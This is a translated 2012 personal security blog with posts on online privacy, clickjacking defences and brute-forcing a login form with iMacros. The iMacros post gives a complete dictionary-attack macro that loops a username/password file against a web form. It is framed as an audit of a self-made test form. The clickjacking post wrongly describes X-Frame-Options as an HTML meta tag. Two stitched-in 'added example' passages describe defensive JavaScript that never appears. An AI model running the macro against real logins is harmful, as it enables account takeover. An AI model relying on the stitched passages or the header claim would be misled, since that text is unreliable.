Monday, May 21, 2012

3. Personal image on the Internet: privacy vs control


"Between the idea and the reality, Between the motion and the act, falls the shadow" - T. S. Eliot




Hello!

This will be a different post, one that has nothing to do with my original idea for the blog: I will try an opinion post. Yes, it will not be technical, so it may reach a wider audience (non-technical people) or a smaller one (is anyone interested?).

The subject I want to theorize about is our presence on the Internet as individuals, the image of us that can be obtained from the web. Times change, the saying "adapt or die" is well known, and I will describe how my view has evolved and the reasons I hold it:

  • Anonymous stage
Working in the security world, my first stage was the search for absolute privacy, to the point of becoming a privacy extremist:
- I never ran Google searches while logged in to Gmail
- I had the Google Analytics IPs redirected to my own machine in the hosts file (translation: I cut off that information flow to Google)
- No Facebook, Tuenti or the like
- Etc., etc., etc.

  • Paranoid stage
One day I created a Facebook account for myself with the sole purpose of preventing someone from impersonating me and, at the same time, finding out what people could say about me. Honestly, I distrust my closest friends; in every aspect of life they keep me on alert day and night :P (there is a precedent: a forum that I had to close due to force majeure).

  • Opening stage
Social networks and Web 2.0 are driving a very important social and technological change and, as part of this world and especially as a computer engineer, I could not stay on the sidelines, so I started to open myself up to the possibility of being part of it and tried to get to know these technologies.

I especially remember the conversation I had with my friend and former boss Javier Megias (@jmegias), who is very active on Twitter, about this social network. He explained to me that, after the first stage of using it as a source of current information, Twitter lets you create your own "brand", define yourself on the network, and give visibility to your work, profile and interests.

  • Self-portrait stage
After outlining the various stages I have gone through, it is time to justify where I find myself now.

It is necessary to be aware that the data we upload to the Internet is no longer our own; we lose control over it. To illustrate, here is a link to a video I used in a talk about privacy on the Internet some years ago, which is still very relevant:



The message is clear: "Think before you post"

Therefore, knowing that we lose control over anything we upload to the Internet, what I recommend is to keep strict control over every word or image. You may wonder, "but why can't I be natural and publish whatever I want?" For one simple reason: you have not bounded the visibility of that information; you cannot define the limits of how far those words reach. Let's see it with an example:

- Do you speak the same way to a policeman as to your friends? Does that make you a hypocrite? No, you simply know how to behave in each situation or environment. But what happens when you cannot be sure who is listening? You moderate yourself, just in case. So do the same on the Internet.

There are several examples of harsh consequences of publishing information on the Net: a dismissal over information posted on Facebook (the man told his employer he was sick and then published photographs of his "holidays"); the fact that nowadays information from social networks and private chats is used in 80% of divorce proceedings in the USA; or a fairly recent situation on Twitter, which I want to focus on in more detail.

It turns out that two British youngsters had planned a holiday in the USA and published some tweets announcing that they were going to have a big party, with phrases like "we are going to burn Troy" or "destroy America", seemingly harmless. To their surprise, on landing in the USA they were detained and later sent back home (original news on www.dailymail.co.uk). This is because the FBI has publicly acknowledged that it monitors social networks.

After trying to raise awareness of the importance of strict control over published information, I am going to detail some of the measures I currently take:
  • I use the Google+ social network, but I have turned off the famous "instant upload" (automatic upload of pictures taken with the phone to your account)
  • I don't take naked photos of myself and never will, neither with my normal camera nor with a smartphone (do you know the #scarlettjohanssoning case?)
  • I don't use Google Latitude; why should I always be locatable? I value my privacy
  • I use Foursquare despite the loss of privacy because I appreciate its benefits
  • I have disabled geotagging of photos
  • I try to avoid giving many clues that I am on vacation and that my house is completely empty, at the mercy of burglars. There are some websites dedicated exclusively to finding out whether a given individual may be on vacation, but I think it best not to link to any
  • I want to implement an archaic protection measure on my laptop that @chemaalonso already uses, which consists of covering the webcam with an adhesive plaster or similar, just in case...
Recently I read an article by @enriquedans in which he commented that, as we know, nowadays every human resources department that prides itself runs a Google search for information on applicants, but there are some that do not even ask you for a resumé: the information they find on the net serves as your cover letter. The article is this: XXXX ¿Curriculum vitae? Are you from the past? (in Spanish)

So, after this long discourse (mental note: write shorter posts) on whether to hide or to publish without fear, I advocate control, and the conclusion is simple: Paint yourself!



Well, this article lends itself to opinions, so I encourage you to leave yours in the comments and see the different points of view.

Greetings!


NOTE: This is a non-automatic translation of the original blog post, written in Spanish. I hope it is understandable; please tell me if you find errors. Thanks a lot!

Sunday, May 13, 2012

2. Clickjacking protection


"Work to prevent crime not to need punishment" - Confucius




Hello!

In this second post I am going to talk about the different measures that have been used to prevent clickjacking techniques, or click hijacking, whose definition I link from Wikipedia in Spanish or, more thoroughly developed, in English.

I must admit that I ran into these measures when I was trying to bypass a restriction which, furthermore, was not strictly click hijacking: I was trying to load a popular page (whose name I would rather not remember) in a frame. My intention was to interact with this page from a frame of my own using JavaScript.




However, I found several countermeasures designed to prevent the above behaviour and so preclude the click hijacking technique, because this capability can be abused to take control of the user's clicks.


I was trying to work out the concept of clickjacking when I found a very good explanation, on a blog I did not know, that I recommend you read, as it is clearly explained: http://rooibo.wordpress.com/2008/10/05/clickjacking-a-fondo-y-con-ejemplos/ (in Spanish)

So let's look at the defenses that have been used to prevent this attack.


One possible solution is to use browser add-ons (extensions or plugins) that protect against this attack. The first option is the popular NoScript for Firefox, which lets you define a whitelist of domains you trust to run JavaScript. However, this option does not work for everyone, because of the added complexity and, above all, because it shifts the responsibility to end users, who need not know anything about clickjacking, JavaScript or flux capacitors.

So I understand that it is not the user's responsibility; the controls must be moved to the server side.

The most popular option has always been to insert custom JavaScript code into the web page to hinder this attack as much as possible; non-standard, ad hoc measures have been used, built with the best the programmers could come up with plus obfuscation of that code. These protections are the target of constant attempts to circumvent them, so on the most popular pages we have seen real races of measures, countermeasures, counter-countermeasures, and so on.

In the following link we can see how JavaScript code is developed to prevent a web page from being included in a frame (a "frame buster") and also how that protection can be bypassed (a "frame buster buster"): StackOverflow Frame buster buster.

Well, there I was, trying to get my counter-counter-protection_against_frames, fighting with JavaScript, when I realised that there was a new protection measure that went beyond this cat-and-mouse approach.

And this measure is a simple idea that Microsoft implemented in IE8: a meta tag named X-FRAME-OPTION that is inserted into the header of the HTML code of a page that does not want to be included in a frame. Thus, when the browser sees this tag, it understands that the page does not want to be included in a frame and does not load it. This measure soon became a de facto standard, implemented in most browsers.
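As an added example, not code from the original post, here is a defender-side model of the anti-framing protection discussed above: the headers a page should send, and a check of whether a response with given headers could be framed from a given origin; note that browsers honour X-Frame-Options only as an HTTP response header, never as an HTML meta tag, and that a Content-Security-Policy frame-ancestors directive takes precedence when both are present. Function names and the example origins are my own assumptions.

```javascript
// Added example (not code from the original post): a defender-side model of
// how browsers apply the anti-framing response headers discussed above.
// Assumption: origins are compared as exact strings such as "https://a.example".

// Headers a page should send when it must never be embedded in a frame.
// X-Frame-Options only works as an HTTP response header; a <meta> tag is
// ignored. The CSP frame-ancestors directive is the standardised successor.
function protectedHeaders() {
  return {
    'Content-Type': 'text/html; charset=utf-8',
    'X-Frame-Options': 'DENY',
    'Content-Security-Policy': "frame-ancestors 'none'",
  };
}

// Returns true when a page served with `headers` from `pageOrigin` may be
// framed by a document whose origin is `embedderOrigin`.
function framingAllowed(headers, pageOrigin, embedderOrigin) {
  const h = {};
  for (const [name, value] of Object.entries(headers)) {
    h[name.toLowerCase()] = String(value).trim();
  }

  // When CSP carries frame-ancestors, browsers ignore X-Frame-Options.
  const csp = h['content-security-policy'] || '';
  const directive = csp.split(';').map(s => s.trim())
    .find(s => s.toLowerCase().startsWith('frame-ancestors'));
  if (directive) {
    const sources = directive.split(/\s+/).slice(1)
      .map(s => s.replace(/^'|'$/g, '').toLowerCase());
    if (sources.includes('none')) return false;
    if (sources.includes('self') && embedderOrigin === pageOrigin) return true;
    return sources.includes('*') || sources.includes(embedderOrigin.toLowerCase());
  }

  // Otherwise fall back to X-Frame-Options.
  const xfo = h['x-frame-options'] || '';
  const token = xfo.toUpperCase();
  if (token === 'DENY') return false;
  if (token === 'SAMEORIGIN') return embedderOrigin === pageOrigin;
  // ALLOW-FROM was only ever honoured by a few browsers; modelled for
  // completeness, not something to rely on.
  if (token.startsWith('ALLOW-FROM ')) return xfo.slice(11).trim() === embedderOrigin;
  // No header, or an unrecognised value: the page can be framed.
  return true;
}

// Constructed sample responses: the unprotected one beside the hardened one.
const WEAK_HEADERS = { 'Content-Type': 'text/html' };
const HARDENED_HEADERS = protectedHeaders();
```

In a Node.js handler the hardened set is applied with `res.writeHead(200, protectedHeaders())`; the check function is useful for auditing captured responses of your own sites.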

So the only way to bypass this protection is to modify the user's browser, which prevents a mass attack.

So with this my idea was definitively frustrated, because my intention was to add functionality to this website, not to trick the user into installing an add-on that modifies their browser's behaviour; for that purpose it is more ethical and easier to make a plugin that provides the desired functionality directly.

Well, this is not a post teaching an attack or audit technique; quite the contrary, it is about how to protect a website, as a result of not being able to get an "extra feature".

Greetings!

PS: This post has taken more than 3 months to get out, when my intention was to post at least monthly. I promise to pull my socks up so the next one comes out much sooner; I have several ideas I am working on.



Thursday, February 16, 2012

1. Brute-force password testing with iMacros!


"In order to achieve what is possible, you have to try the impossible over and over again" - Hermann Hesse



Hello!

In this post, my first with real content, I am going to present an alternative to the usual brute-force tools used to obtain credentials on a portal.

The story begins one day when I was auditing a website with a form vulnerable to brute-force attacks (because it did not implement waiting times between requests), and I wanted to provide evidence because, as you know, saying "fire burns" is not the same as "put your hand here and you will see how hot it is"; the second option is more striking.

So I tried to use one of the most popular tools for this purpose, Medusa / Hydra, and I went crazy trying to write a command that fit that form, but there was no way. The problem was that the identifiers of the form fields were generated dynamically with JavaScript and had the nice habit of changing, so I could not reference them (if anyone knows how, please explain it to me).

Discarding the common tools, I thought of using iMacros, available as an extension for Firefox (and also part of the excellent FireCat or Mantra suites), which lets you automate tasks in the browser with a lot of versatility.

I got to know iMacros a few years ago thanks to a friend, Mr Adrian Capdevila. He used it to automate repetitive tasks and, later, some restless minds exported the idea to gain an advantage in some web games.

The fact is that this extension lets you record a task and then repeat it over and over again, and this, in essence, is like a brute-force attack; I just had to see whether I could handle variable data so that, as the quote says, by trying "the impossible over and over again" I might "achieve what is possible".

So, as you can imagine since I have written the article, in the end I got it working, and I am going to explain how:

  • We go to our target form (you can see a very simple example I created for the occasion, since it does not seem very ethical to show a real case that could easily be reused) and load the extension.





  • Then, in the "Rec" tab, the click mode should be X/Y, since the value of the HTML tag kept changing and is not useful.



  • Then we click on the "Record" button and take the steps needed for one login attempt, which are:
    • Click on the user text field, "Usuario"
    • Type a user name (anything)
    • Click on the password text field, "Contraseña"
    • Type a password (anything)
    • Click the Login button, "Autenticar"
    • Click on "Stop"
    • Save the generated file with "Save"

NOTE: It is very important to perform these actions with mouse clicks and not by pressing the Tab or Enter keys, because we want to record the positions where we clicked.



  • The file looks like:
VERSION BUILD=7400919 RECORDER=FX
TAB T=1
URL GOTO=http://10.0.0.5/index.html
CLICK X=324 Y=113
TAG POS=1 TYPE=INPUT:TEXT FORM=ACTION:/cgi-bin/validate.pl ATTR=NAME:user CONTENT=usuario
CLICK X=324 Y=113 CONTENT=usuario
CLICK X=324 Y=140
SET !ENCRYPTION NO
CLICK X=324 Y=140 CONTENT=contrasenya
CLICK X=192 Y=164


  • Which can be simplified to:
VERSION BUILD=7400919 RECORDER=FX
TAB T=1
URL GOTO=http://10.0.0.5/index.html
CLICK X=324 Y=113 CONTENT=usuario
SET !ENCRYPTION NO
CLICK X=324 Y=140 CONTENT={{!COL2}}
CLICK X=192 Y=164


  • We can test how it performs in the "Play" tab and, if it goes well, we then have a base that can be modified to work in iterative mode.

  • Now it is necessary to add a file with users and passwords as a data source. In this case I used a file in CSV format because iMacros handles it very well, and with a little Perl script I had previously produced a few lines in the format "user","password".
' File with users and passwords for testing. This is a CSV with 2 columns
SET !DATASOURCE /home/users/jluispellicer/dictionary.csv
SET !DATASOURCE_COLUMNS 2
 

  • Next, iteration over this file must be defined with the !LOOP variable.
' We start the loop with the initial value 1
SET !LOOP 1
SET !DATASOURCE_LINE {{!LOOP}}

  • And finally, substitute the values with the variables that contain the file data.
' Fill name
CLICK X=324 Y=113 CONTENT={{!COL1}}

' Fill password
CLICK X=324 Y=140 CONTENT={{!COL2}}

  • This is the final code, with comments, that works on my form.
VERSION BUILD=7400919 RECORDER=FX

' Close all tabs but the current one
TAB CLOSEALLOTHERS
TAB T=1

' File with users and passwords for testing. This is a CSV with 2 columns
SET !DATASOURCE /home/users/jluispellicer/dictionary.csv
SET !DATASOURCE_COLUMNS 2

' We start the loop with the initial value 1
SET !LOOP 1
SET !DATASOURCE_LINE {{!LOOP}}

' Close page
'URL GOTO=http://10.0.0.5/index.html

' Fill name
CLICK X=324 Y=113 CONTENT={{!COL1}}

' Fill password
SET !ENCRYPTION NO
CLICK X=324 Y=140 CONTENT={{!COL2}}

' Click on the Login button, Autenticar
CLICK X=192 Y=164



  • Once everything is ready, we launch "Repeat Macro Max" with a high value and click on "Play (Loop)", as shown in the following video, which ends with the password being found:


As you will see, it is not a very efficient method, since it waits for the page to fully load, and I have not set any stop condition, but iMacros offers many more possibilities: from the web interface you can write to a file, use JavaScript code, etc., and it can also be used from different programming languages.
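The form in this post was weak because it applied no waiting time between attempts. As an added example, not code from the original post or from iMacros, here is the kind of server-side throttle that closes that gap in a Node.js login handler; the class and method names, the limits and the constructed scenario are my own assumptions.

```javascript
// Added example, not code from the original post: a server-side login throttle,
// the waiting time between attempts that the audited form lacked. Class and
// method names and the limits below are my own assumptions.
const WINDOW_MS = 15 * 60 * 1000;  // failures older than this are forgotten
const FREE_FAILURES = 3;           // failures allowed before delays start
const BASE_DELAY_MS = 2000;        // first delay; doubles with each failure
const MAX_DELAY_MS = 5 * 60 * 1000;

class LoginThrottle {
  constructor() { this.failures = new Map(); }  // key -> failure timestamps

  // Failure timestamps still inside the window, pruned in place.
  _recent(key, now) {
    const list = (this.failures.get(key) || []).filter(t => now - t < WINDOW_MS);
    this.failures.set(key, list);
    return list;
  }

  // Milliseconds `key` must still wait: exponential back-off after the free failures.
  _delay(key, now) {
    const recent = this._recent(key, now);
    const extra = recent.length - FREE_FAILURES;
    if (extra < 0) return 0;
    const delay = Math.min(BASE_DELAY_MS * 2 ** extra, MAX_DELAY_MS);
    const remaining = recent[recent.length - 1] + delay - now;
    return remaining > 0 ? remaining : 0;
  }

  // Call before verifying credentials. Keyed by client address and by account,
  // so neither one source spraying many accounts nor many sources on one account slips through.
  check(ip, user, now = Date.now()) {
    const wait = Math.max(this._delay(`ip:${ip}`, now), this._delay(`user:${user}`, now));
    return { allowed: wait === 0, retryAfterMs: wait };
  }
  recordFailure(ip, user, now = Date.now()) {
    for (const key of [`ip:${ip}`, `user:${user}`]) this._recent(key, now).push(now);
  }
  // A correct login clears the account's counter; the source's counter stays.
  recordSuccess(user) { this.failures.delete(`user:${user}`); }
}

// Constructed scenario mirroring the post: one client trying a dictionary against
// one account, a wrong password every `gapMs` ms. Returns how many guesses got through.
function guessesLetThrough(attempts, gapMs) {
  const throttle = new LoginThrottle();
  let passed = 0;
  for (let i = 0; i < attempts; i++) {
    const now = 1000000 + i * gapMs;
    if (throttle.check('10.0.0.9', 'usuario', now).allowed) {
      passed++;
      throttle.recordFailure('10.0.0.9', 'usuario', now);
    }
  }
  return passed;
}
```

With these limits, 20 guesses half a second apart get only 5 through, and a rejected request should carry the `retryAfterMs` value back in a Retry-After header.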

Well, I hope you liked it. If you have any questions you can ask in the comments, and if you want any script or file I used, you can request it from me without problem. I did not want to go into too much detail, for example about the extension's API, so as not to focus on that but rather on the possibility of using iMacros for this purpose.


Greetings!



Wednesday, February 15, 2012

0. Blog's opening


"Imagination is more important than knowledge. Knowledge is limited. Imagination encircles the world." - Albert Einstein



Hello!

Strange title for a security blog, right?

For some years I have been a passive user of the Internet, especially of the security forums and blogs that fill my RSS, where I have sometimes contributed something but, basically, I have been a big consumer; today is the day I have decided to make the leap and start contributing through my own blog.

The intention is pretty simple: use a famous quote to introduce a security article. These "articles" will usually consist of guidelines I drafted for myself on some task I had to do and have decided to save for the future, because my memory is not a place I consider reliable.

I do not know what publishing rhythm I will keep; I hope for at least one post a month, and we will see whether this encourages participation and does not end up being an extension of my "howtos" repository.

Greetings!

